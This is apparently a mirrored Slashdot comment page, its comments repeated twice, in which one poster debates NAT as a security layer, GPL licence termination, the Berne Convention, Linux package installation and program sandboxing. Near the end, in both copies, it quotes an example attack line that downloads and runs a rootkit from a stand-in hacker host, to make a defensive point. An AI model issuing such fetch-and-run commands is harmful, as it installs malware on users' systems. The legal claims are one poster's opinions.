Re:Wow! think of all them IP addresses.
on
The Next Net
·
· Score: 1
You are assuming that every packet that comes down your internet connection will have a destination IP address matching
No, I assume that my NAT box will drop any packets whose address don't match it. That is the case with my own NAT, although I suppose others could function promiscuously, although that would be contrary to the definition of NAT. (And it would be quite inefficient, as flooding the ethernet hubs inside NATs with all their neighbors' non-matching packets) If you think that many NATs disobey that definition, then you might submit corrections to pages like this and especially this.
your router's public IP address.
You are assuming I even HAVE a router. Router != NAT... routers expose the addresses of machines behind them, NATs hide these.
1. You are effectively placing the security of your LAN into the hands of your ISP.
1. For most people, who are (as I said) sadly clueless, that security is better than if they were plugging Windows XP directly into the internet.
2. The ISP already has its hands on security for most LANs. As the ISP, they are in a fine position to man-in-the-middle and replace any software you download with trojaned versions. Those security-conscious people who make sure that everything is downloaded encrypted are safe, but they are outside the class of user I was discussing.
In this situation other users can simply add a route to your LAN's address via your outside IP address and viola, full access to your LAN.
Once again, relies on the assumption that a Network Address Translator will pass through untranslated packets.
The Berne Convention is that pesky treaty that allows any country to enforce its specific blend of copyright law anywhere in the world.
No. The USA, at least, was forced* to re-write some of its copyright laws to "follow the international standard" before it could join Berne. At the same time, some European countries were made to change their laws to match the USA, with the net effect being that both regions adopted the most restrictive parts of both their laws.
* I shouldn't quite say "forced". Rather, lobbyists for the USA's publishing corporatations used "We've got to comply with the Berne standard" as an excuse to get stricter laws passed.
Re:Wow! think of all them IP addresses.
on
The Next Net
·
· Score: 1
Not so, since NAT does not drop anything. If a totally unexpected packet arrives, NAT will simply not make any changes to the packet.
Fine, semantics. The packet is unmodified, so its address matches to none of the TCP/IP stacks on the LAN, so it gets dropped by every PC. Not rewriting an address is effectively dropping it (unless you somehow had a local machine with an IP identical to that of your NAT box on the Internet)
While in theory I think such a system would be useful it wouldn't help the users needing it most since they are to clueless to use it.
Of course, there must be UI guidelines in place so the default behavior is safer than we have now.
For example, assuming a OS-controlled priviledge separation is working to the point where it is ensure that a program can perform high-speed 3d graphics, but not view any of your files, keyboard/mouse input, or screen/sound output from other programs. Then, it would be appropriate for any executable file a user clicks on in a web-browser to be installed that way.
If the program needs more access priviledges (such as to read/write files to directories outside of where it was installed), then the system should display a large, threatening dialog box, "Warning, do you want to allow this, it could be harmful, blah blah, only if you trust this certificate-signer, blah blah". And, at the administrator's option, the user might not even have the ability to hand out those priviledges at all... they would need to wait for the root user to approve the app.
(Naturally, this is a complex subject with many intricate problems. Just because I didn't list them all here doesn't mean the concern is unknown, or there aren't solutions)
Why would you go surfing the Internet for random pieces of software
Google is a better search engine than most any. Even for a random piece of information which I _know_ I have stored on my own hard drive, its often faster for me to locate the original again on Google, rather than scanning my own disk.
when they are already under the icon labelled "install software" on your desktop?
Of all the software a user could install on her computer, 100% of it can be located on Google. Necessarily, the Synaptic list will be smaller, and have a greater chance of not containing the program she wants. (That is especially true if the program is either very new, or distributed through commercial sales, or both). And obviously, users tend to search for things where they can be found.
(Plus, the opening interface of synaptic is fairly hostile if your goal is to discover software to fit a need, instead of installing a package whose name and prsence you already know)
Look, read the freakin' license, it specifically says that if you violate the license your rights under the license are terminated.
That is true, but irrelevant, so I will explain slowly:
1. I download Linux.
2. I modify and restribute Linux. This would be a copyright violation, except that the license allows me to do so. 3. I violate the GPL license in some way. My permission to distribute modified copies goes away. 4. I stop violating the GPL license. 5. I download Linux again. It comes with a new license. 6. Since the new license I got hasn't been terminated, I proceed to distributed modified copies again.
Maybe you still think that because the first and second licenses I got are identical to each other (and to the widely-used GPL), that they are the same license. They aren't. Many kinds of licenses and contracts have identical boilerplate text, yet when they say "This License", they mean that license, not all other licenses sharing those terms. If the publisher sells you a second copy of her work with an identical license, you now have two licenses, and you can invalidate either of them by breaking its rules, while retaining the other.
That's it, there's no regaining the rights from someone else, the copyright holder has terminated your rights
True, if the copyright holder doesn't want me to provide me her software under the GPL anymore, she is free to not give me anymore copies. But as long as she (or anyone else) is providing new copies under the GPL, I can grab any of them and use it. (And obviously, its virtually impossible for the original author to stop 3rd parties from redistributing, since she gave them explicit permission to do so by released as GPL)
Even more so, countries like Australia (which is where I'm at BTW) specifically state that a copyright holder can terminate a license at any time and for any reason
If that were true, then Linus Torvalds would absolutely not accept patches from Australians. That would mean that an Australian who'd contributed a 5-line fix to Linux could point to any random person using that OS and demand him to power down and erase his bootloader. There would be no commercial use of Linux (or any software with an Australian contributor), because the risk that the programmer will spontaneously decide to revoke your license in the middle of operations is too large.
Look, read the freakin' license, it specifically says that if you violate the license your rights under the license are terminated.
Yes, I've read it. You violate it, your rights under the license are terminated. So then download one of the thousands of other copies with identical licenses from all over the internet, and proceed using it.
You might be confusing "this license" with "other licenses that are identical copies of this one". Those things are not the same, for copyright purposes at least. Each license file stands on its own.
specifically state that a copyright holder can terminate a license at any time and for any reason. The Berne Convention would permit me to exercise that right in any country that has signed the WIPO treaty
The Berne Convention does not allow for license termination in any way (without affirmative consent from licensee). Only if the work was copyrighted before your country became a Berne signatory might you have that ability, and only towards fellow citizens. (And Austrialia probably joined the treaty too long ago to be relevant to modern programming)
Hypothetically though, if you had modified a GPL program back before attaching to Berne, and if you then revoked your license, you would have violated the GPL, and no longer allowed to distribution modifications of the original yourself. (Until, of course, you re-acquired a new GPL license, which you don't believe is possible)
Re:Wow! think of all them IP addresses.
on
The Next Net
·
· Score: 1
It doesn't actually make any decisions to drop or accept packets.
If a totally unexpected packet arrives at a NAT (such as during a portscan attack), there is no reasonable way to guess which of the multiple local machines should recieve it, so (by default) a choice is made to drop it. (Of course, by "choice"- the NAT isn't making a choice then, but rather the choice to drop all unexpected packets was made by the admin who installed a NAT in the first place)
That level of protection is useful for many people.
The principle use of the VCR was manifestly a fair use in the sense that it did not negatively affect the copyright owners interests.
That's false. The principle VCR use is negative for the copyright owners, even if that use is merely time-shifting. Fair Use doesn't require zero economic harm, however- only that economic harm has been taken into account as part of the overall consideration.
Yesterday: keeping something you already got Today: getting something you never had
So exactly who's complaining here?
The HBO network whose Sopranos and Deadwood you are watching without paying for a premium cable subscription. And all the broadcast-TV producers with plans of a DVD release someday in the future.
"We'll be back after these words fro-[[pause]]... [[unpause]]-lcome Back, everyone!..."
That approach requires the user to actually pay MORE attention to the commercials than she would otherwise, so it is not "easily done". Plus, if you are monitoring the commercials while the program is recording, then you are also watching the program as it airs, and not "time shifting" at all.
Projectile motion tells me that to fire a projectile in a near straight line over any meaningful distance, the velocity must be very high. What kind of projectile do you think can travel at the speed of a bullet and NOT be lethal?
Way to reverse cause and effect. They're not lethal because the bullet moves fast- the bullet is fast TO BE LETHAL.
What kind of projectile do you think can travel at the speed of a bullet and NOT be lethal?
The F-15 Eagle, or anything else with controlled deceleration.
Wrong. In the USA, drugs are legal. For every illegal drug you can name, I can list 99 legal ones. That's higher than the ratio of legal to illegal guns.
It would be easier for hardware makers to build an LCD display with a transparent backing that would allow crystal clear images on top of a completely transparent background.
Been done. I can't remember the company name right now (probably, they went bankrupt), but they sold a "folded LCD" monitor, which appeared as 2560x1024 to software, although in hardware it was two 1280x1024 LCDs on top of each other. Windows placed on the right half of your desktop would be visible on top of the pixel 1280 to its left, and the color white (or user-settable) was transparent on the foreground panel.
A very expensive gimmick of very limited application. (Oh, the front screen was touchscreen mouse-input too)
Re:Wow! think of all them IP addresses.
on
The Next Net
·
· Score: 1
The only reason so many people use it today is because real address space is too limited.
Sadly, NAT is also heavily used as a security mechanism. Have you ever heard the line "Be certain to boot Windows XP behind NAT until you've at least downloaded service pack 2"?
Re:no to flash!
on
The Next Net
·
· Score: 3, Informative
don't be silly, anyway they're talking about the net, not the web, ie, the infrastructure, not format's of files that could be transfered over it.
No. IETF spends more of their time on file content than byte-pushing "infrastructure". For example, the HTML format is IETF RFC 1866. Any file that's mainly viewed over the internet is potential IETF fodder.
(Flash is too old and too intentionally openness-hostile to ever become an IETF standard, of course. But it'd be good if it could be replaced by something which is a standard, maybe SVG)
For normal users installing software, a GUI effectively doesn't exist if it's outside of the "Google path". That is, they will search Google for the software, and find either a direct-download link, or a store offering to ship it for money. Either way, they acquire an install file, click on it, and the install GUI begins.
Because synaptic is outside the distrib flow chain of most software publishers, it is so far off the radar it might as well not exist. (You can't go to the homepage for Firefox or OpenOffice and get instructions "look for it in synaptic first, if you have synaptic, and if you know what the root password is").
Who is "scared of Linux" because Synaptic is too hard?
Synaptic isn't a very nice GUI. In particular, deb packages can have interactive questions embedded in them, which are handled within a popup xterm. Until synaptic manages to 100% swallow those as X11 dialog-boxes, it won't even qualify for what most people call "GUI"
PS. Synaptic could be tremendously improved if it got another pane replacing the package list, which showed only those packages most potentially interesting to desktop end-users, with a colorful icon and 3 line description for each. Something like a top-forty, with a weekly "Editor's Pick" and "New Releases".
Yeah, there might be some distroes offering this kind of automated package management to even non-paying users now, but I can't see how they can keep that up if people generally take a free-lunch approach.
The first distros to offer that service did it for free, long before "commercial Linux support" became an active marketplace.
However, you have a point. Although that time and effort isn't passed onto users directly (because the volunteers are generous), the fact that they need to spend all that time means (a) the rate their users can get new software is slowed, and more importantly (b) those volunteers are spending their time on maintenance busy-work, instead of REALLY improving the distro.
The current Linux model of distros integrating and authenticating software from upstream authors helps ensure the security of the userbase as well as providing installation ease of use.
The Linux model is minorly better than the Windows system, but that's not enough to really deserve pride. ("Vote for me! I'm not as evil as Saddam Hussein!")
Requiring software to be combed over by the distro-team before it makes it to your desktop is error-prone and degrades the progress of software development. The adoption of new and highly superior competitive packages is slowed, because people continue to use whichever one their distro has an existing packaging relationship.
Far better would be a finely-grained choice about trusting a program. Priviledge separate. Today, users can decide only to (a) not execute a program at all, or (b) execute a program with all the rights I have, including reading/writing all my files.
A system akin to the Java "sandbox" should be extended for general program use, so a user can download and execute (for example) a free game demo from an unauthenticated publisher, and be sure it won't compromise her account- and not because a slow, fallable human audited the code, but because the speedy local OS prevented it from touching any resources beyond what it legitimately required
If the Windows Paradigm was broken people would not use Windows.
And if tobacco was harmful, people would not smoke cigarettes.
The worldview that "something which even approximately works today never needs to be changed" is a depressing one, and if followed, would've prevent the development of automobiles, airplanes, steamships, etc.
Uh, I'm just saying that the Linux community ought to learn from the mistakes of the proprietary software community instead of going along for the ride.
No, you aren't saying that. You are advocating Linux follow Microsoft's example.
Autopackage is 100% against how the proprietary software world works. In proprietary software (which basically means "Microsoft Windows software"), there is no such thing as a package manager, a package format, or dependency analysis. There are no "packages", just "installers", which are completely arbitrary programs that users execute to (hopefully) install something, but which might be doing anything else.
. It's meant to aid the installation of packaged software from third party sources and manage dependancies in order to accomplish this. That is specifically my problem with it, it is a tool for enabling dangerous behaviour for unexperienced users.
The factor blocking the deployment of "malware" to Linux isn't the intractability of Linux software installing, but the low population size of unskilled users, and the low explotiation value of that population (same as the largest reason there are few "viruses").
Do not imagine that if Linux had the popularity of Microsoft(tm) Windows(r), it would take the malware coders more than a week to get into business. All they need is to provide executable files to run, and end-users they can convince to download files and then double-click them (assuming that Linux web browsers continue to non-autoexecute downloaded binaries). Once they've run that one binary, it can either execute the malware immediately, or merely install it in the user's writable disk space (including ~/.login, as well as ~/.firefox and maybe elsewhere)
If a system administrator feels his users at risk of installing malware, she is well able to disallow execution of files in their homedirectories. This will prevent home-grown attacks (like "paste these 3 lines into a terminal: wget http://download.hacker.com/rootkit;./rootkit"), and also make autopackage impotent as a side-effect. (An admin with this attitude would also disallow users from running autopackage at all, of course)
Slashdot Mirror
You are assuming that every packet that comes down your internet connection will have a destination IP address matching
No, I assume that my NAT box will drop any packets whose address don't match it. That is the case with my own NAT, although I suppose others could function promiscuously, although that would be contrary to the definition of NAT. (And it would be quite inefficient, as flooding the ethernet hubs inside NATs with all their neighbors' non-matching packets) If you think that many NATs disobey that definition, then you might submit corrections to pages like this and especially this.
your router's public IP address.
You are assuming I even HAVE a router. Router != NAT... routers expose the addresses of machines behind them, NATs hide these.
1. You are effectively placing the security of your LAN into the hands of your ISP.
1. For most people, who are (as I said) sadly clueless, that security is better than if they were plugging Windows XP directly into the internet.
2. The ISP already has its hands on security for most LANs. As the ISP, they are in a fine position to man-in-the-middle and replace any software you download with trojaned versions. Those security-conscious people who make sure that everything is downloaded encrypted are safe, but they are outside the class of user I was discussing.
In this situation other users can simply add a route to your LAN's address via your outside IP address and viola, full access to your LAN.
Once again, relies on the assumption that a Network Address Translator will pass through untranslated packets.
The Berne Convention is that pesky treaty that allows any country to enforce its specific blend of copyright law anywhere in the world.
No. The USA, at least, was forced* to re-write some of its copyright laws to "follow the international standard" before it could join Berne. At the same time, some European countries were made to change their laws to match the USA, with the net effect being that both regions adopted the most restrictive parts of both their laws.
* I shouldn't quite say "forced". Rather, lobbyists for the USA's publishing corporatations used "We've got to comply with the Berne standard" as an excuse to get stricter laws passed.
Not so, since NAT does not drop anything. If a totally unexpected packet arrives, NAT will simply not make any changes to the packet.
Fine, semantics. The packet is unmodified, so its address matches to none of the TCP/IP stacks on the LAN, so it gets dropped by every PC. Not rewriting an address is effectively dropping it (unless you somehow had a local machine with an IP identical to that of your NAT box on the Internet)
While in theory I think such a system would be useful it wouldn't help the users needing it most since they are to clueless to use it.
Of course, there must be UI guidelines in place so the default behavior is safer than we have now.
For example, assuming a OS-controlled priviledge separation is working to the point where it is ensure that a program can perform high-speed 3d graphics, but not view any of your files, keyboard/mouse input, or screen/sound output from other programs. Then, it would be appropriate for any executable file a user clicks on in a web-browser to be installed that way.
If the program needs more access priviledges (such as to read/write files to directories outside of where it was installed), then the system should display a large, threatening dialog box, "Warning, do you want to allow this, it could be harmful, blah blah, only if you trust this certificate-signer, blah blah". And, at the administrator's option, the user might not even have the ability to hand out those priviledges at all... they would need to wait for the root user to approve the app.
(Naturally, this is a complex subject with many intricate problems. Just because I didn't list them all here doesn't mean the concern is unknown, or there aren't solutions)
Why would you go surfing the Internet for random pieces of software
Google is a better search engine than most any. Even for a random piece of information which I _know_ I have stored on my own hard drive, its often faster for me to locate the original again on Google, rather than scanning my own disk.
when they are already under the icon labelled "install software" on your desktop?
Of all the software a user could install on her computer, 100% of it can be located on Google. Necessarily, the Synaptic list will be smaller, and have a greater chance of not containing the program she wants. (That is especially true if the program is either very new, or distributed through commercial sales, or both). And obviously, users tend to search for things where they can be found.
(Plus, the opening interface of synaptic is fairly hostile if your goal is to discover software to fit a need, instead of installing a package whose name and prsence you already know)
That is true, but irrelevant, so I will explain slowly:
2. I modify and restribute Linux. This would be a copyright violation, except that the license allows me to do so.
3. I violate the GPL license in some way. My permission to distribute modified copies goes away.
4. I stop violating the GPL license.
5. I download Linux again. It comes with a new license.
6. Since the new license I got hasn't been terminated, I proceed to distributed modified copies again.
Maybe you still think that because the first and second licenses I got are identical to each other (and to the widely-used GPL), that they are the same license. They aren't. Many kinds of licenses and contracts have identical boilerplate text, yet when they say "This License", they mean that license, not all other licenses sharing those terms. If the publisher sells you a second copy of her work with an identical license, you now have two licenses, and you can invalidate either of them by breaking its rules, while retaining the other.
That's it, there's no regaining the rights from someone else, the copyright holder has terminated your rights
True, if the copyright holder doesn't want me to provide me her software under the GPL anymore, she is free to not give me anymore copies. But as long as she (or anyone else) is providing new copies under the GPL, I can grab any of them and use it. (And obviously, its virtually impossible for the original author to stop 3rd parties from redistributing, since she gave them explicit permission to do so by released as GPL)
Even more so, countries like Australia (which is where I'm at BTW) specifically state that a copyright holder can terminate a license at any time and for any reason
If that were true, then Linus Torvalds would absolutely not accept patches from Australians. That would mean that an Australian who'd contributed a 5-line fix to Linux could point to any random person using that OS and demand him to power down and erase his bootloader. There would be no commercial use of Linux (or any software with an Australian contributor), because the risk that the programmer will spontaneously decide to revoke your license in the middle of operations is too large.
Look, read the freakin' license, it specifically says that if you violate the license your rights under the license are terminated.
Yes, I've read it. You violate it, your rights under the license are terminated. So then download one of the thousands of other copies with identical licenses from all over the internet, and proceed using it.
You might be confusing "this license" with "other licenses that are identical copies of this one". Those things are not the same, for copyright purposes at least. Each license file stands on its own.
specifically state that a copyright holder can terminate a license at any time and for any reason. The Berne Convention would permit me to exercise that right in any country that has signed the WIPO treaty
The Berne Convention does not allow for license termination in any way (without affirmative consent from licensee). Only if the work was copyrighted before your country became a Berne signatory might you have that ability, and only towards fellow citizens. (And Austrialia probably joined the treaty too long ago to be relevant to modern programming)
Hypothetically though, if you had modified a GPL program back before attaching to Berne, and if you then revoked your license, you would have violated the GPL, and no longer allowed to distribution modifications of the original yourself. (Until, of course, you re-acquired a new GPL license, which you don't believe is possible)
It doesn't actually make any decisions to drop or accept packets.
If a totally unexpected packet arrives at a NAT (such as during a portscan attack), there is no reasonable way to guess which of the multiple local machines should recieve it, so (by default) a choice is made to drop it. (Of course, by "choice"- the NAT isn't making a choice then, but rather the choice to drop all unexpected packets was made by the admin who installed a NAT in the first place)
That level of protection is useful for many people.
The principle use of the VCR was manifestly a fair use in the sense that it did not negatively affect the copyright owners interests.
That's false. The principle VCR use is negative for the copyright owners, even if that use is merely time-shifting. Fair Use doesn't require zero economic harm, however- only that economic harm has been taken into account as part of the overall consideration.
Yesterday: keeping something you already got
Today: getting something you never had
So exactly who's complaining here?
The HBO network whose Sopranos and Deadwood you are watching without paying for a premium cable subscription. And all the broadcast-TV producers with plans of a DVD release someday in the future.
"We'll be back after these words fro-[[pause]]... [[unpause]]-lcome Back, everyone!..."
That approach requires the user to actually pay MORE attention to the commercials than she would otherwise, so it is not "easily done". Plus, if you are monitoring the commercials while the program is recording, then you are also watching the program as it airs, and not "time shifting" at all.
Projectile motion tells me that to fire a projectile in a near straight line over any meaningful distance, the velocity must be very high. What kind of projectile do you think can travel at the speed of a bullet and NOT be lethal?
Way to reverse cause and effect. They're not lethal because the bullet moves fast- the bullet is fast TO BE LETHAL.
What kind of projectile do you think can travel at the speed of a bullet and NOT be lethal?
The F-15 Eagle, or anything else with controlled deceleration.
Well, here in the US, drugs are illegal.
Wrong. In the USA, drugs are legal. For every illegal drug you can name, I can list 99 legal ones. That's higher than the ratio of legal to illegal guns.
AC: This would get us past the unessarily high cost of verifying an author's death + the nonsense of determinging if a work os owned by a corporation.
It will also reduce the slaughter of hapless authors by fanfic writers who want their source material to become public domain faster.
If 70 million daily visitors don't take them down, I doubt that 250,000 more are going to make much of a difference.
If microsoft had just that day released a 400 megabyte downloadable critical service pack... anything goes.
Or wait until it is night / dark / light etc.
Take 24 pictures spaced throughout the day, then install a utility to swap your wallpaper to the matching image every hour.
It would be easier for hardware makers to build an LCD display with a transparent backing that would allow crystal clear images on top of a completely transparent background.
Been done. I can't remember the company name right now (probably, they went bankrupt), but they sold a "folded LCD" monitor, which appeared as 2560x1024 to software, although in hardware it was two 1280x1024 LCDs on top of each other. Windows placed on the right half of your desktop would be visible on top of the pixel 1280 to its left, and the color white (or user-settable) was transparent on the foreground panel.
A very expensive gimmick of very limited application. (Oh, the front screen was touchscreen mouse-input too)
The only reason so many people use it today is because real address space is too limited.
Sadly, NAT is also heavily used as a security mechanism. Have you ever heard the line "Be certain to boot Windows XP behind NAT until you've at least downloaded service pack 2"?
don't be silly, anyway they're talking about the net, not the web, ie, the infrastructure, not format's of files that could be transfered over it.
No. IETF spends more of their time on file content than byte-pushing "infrastructure". For example, the HTML format is IETF RFC 1866. Any file that's mainly viewed over the internet is potential IETF fodder.
(Flash is too old and too intentionally openness-hostile to ever become an IETF standard, of course. But it'd be good if it could be replaced by something which is a standard, maybe SVG)
Synaptic. Already there.
No it isn't.
For normal users installing software, a GUI effectively doesn't exist if it's outside of the "Google path". That is, they will search Google for the software, and find either a direct-download link, or a store offering to ship it for money. Either way, they acquire an install file, click on it, and the install GUI begins.
Because synaptic is outside the distrib flow chain of most software publishers, it is so far off the radar it might as well not exist. (You can't go to the homepage for Firefox or OpenOffice and get instructions "look for it in synaptic first, if you have synaptic, and if you know what the root password is").
Who is "scared of Linux" because Synaptic is too hard?
Synaptic isn't a very nice GUI. In particular, deb packages can have interactive questions embedded in them, which are handled within a popup xterm. Until synaptic manages to 100% swallow those as X11 dialog-boxes, it won't even qualify for what most people call "GUI"
PS. Synaptic could be tremendously improved if it got another pane replacing the package list, which showed only those packages most potentially interesting to desktop end-users, with a colorful icon and 3 line description for each. Something like a top-forty, with a weekly "Editor's Pick" and "New Releases".
Yeah, there might be some distroes offering this kind of automated package management to even non-paying users now, but I can't see how they can keep that up if people generally take a free-lunch approach.
The first distros to offer that service did it for free, long before "commercial Linux support" became an active marketplace.
However, you have a point. Although that time and effort isn't passed onto users directly (because the volunteers are generous), the fact that they need to spend all that time means (a) the rate their users can get new software is slowed, and more importantly (b) those volunteers are spending their time on maintenance busy-work, instead of REALLY improving the distro.
The current Linux model of distros integrating and authenticating software from upstream authors helps ensure the security of the userbase as well as providing installation ease of use.
The Linux model is minorly better than the Windows system, but that's not enough to really deserve pride. ("Vote for me! I'm not as evil as Saddam Hussein!")
Requiring software to be combed over by the distro-team before it makes it to your desktop is error-prone and degrades the progress of software development. The adoption of new and highly superior competitive packages is slowed, because people continue to use whichever one their distro has an existing packaging relationship.
Far better would be a finely-grained choice about trusting a program. Priviledge separate. Today, users can decide only to (a) not execute a program at all, or (b) execute a program with all the rights I have, including reading/writing all my files.
A system akin to the Java "sandbox" should be extended for general program use, so a user can download and execute (for example) a free game demo from an unauthenticated publisher, and be sure it won't compromise her account- and not because a slow, fallable human audited the code, but because the speedy local OS prevented it from touching any resources beyond what it legitimately required
If the Windows Paradigm was broken people would not use Windows.
And if tobacco was harmful, people would not smoke cigarettes.
The worldview that "something which even approximately works today never needs to be changed" is a depressing one, and if followed, would've prevent the development of automobiles, airplanes, steamships, etc.
Uh, I'm just saying that the Linux community ought to learn from the mistakes of the proprietary software community instead of going along for the ride.
No, you aren't saying that. You are advocating Linux follow Microsoft's example.
Autopackage is 100% against how the proprietary software world works. In proprietary software (which basically means "Microsoft Windows software"), there is no such thing as a package manager, a package format, or dependency analysis. There are no "packages", just "installers", which are completely arbitrary programs that users execute to (hopefully) install something, but which might be doing anything else.
. It's meant to aid the installation of packaged software from third party sources and manage dependancies in order to accomplish this. That is specifically my problem with it, it is a tool for enabling dangerous behaviour for unexperienced users.
The factor blocking the deployment of "malware" to Linux isn't the intractability of Linux software installing, but the low population size of unskilled users, and the low explotiation value of that population (same as the largest reason there are few "viruses").
Do not imagine that if Linux had the popularity of Microsoft(tm) Windows(r), it would take the malware coders more than a week to get into business. All they need is to provide executable files to run, and end-users they can convince to download files and then double-click them (assuming that Linux web browsers continue to non-autoexecute downloaded binaries). Once they've run that one binary, it can either execute the malware immediately, or merely install it in the user's writable disk space (including ~/.login, as well as ~/.firefox and maybe elsewhere)
If a system administrator feels his users at risk of installing malware, she is well able to disallow execution of files in their homedirectories. This will prevent home-grown attacks (like "paste these 3 lines into a terminal: wget http://download.hacker.com/rootkit;./rootkit"), and also make autopackage impotent as a side-effect. (An admin with this attitude would also disallow users from running autopackage at all, of course)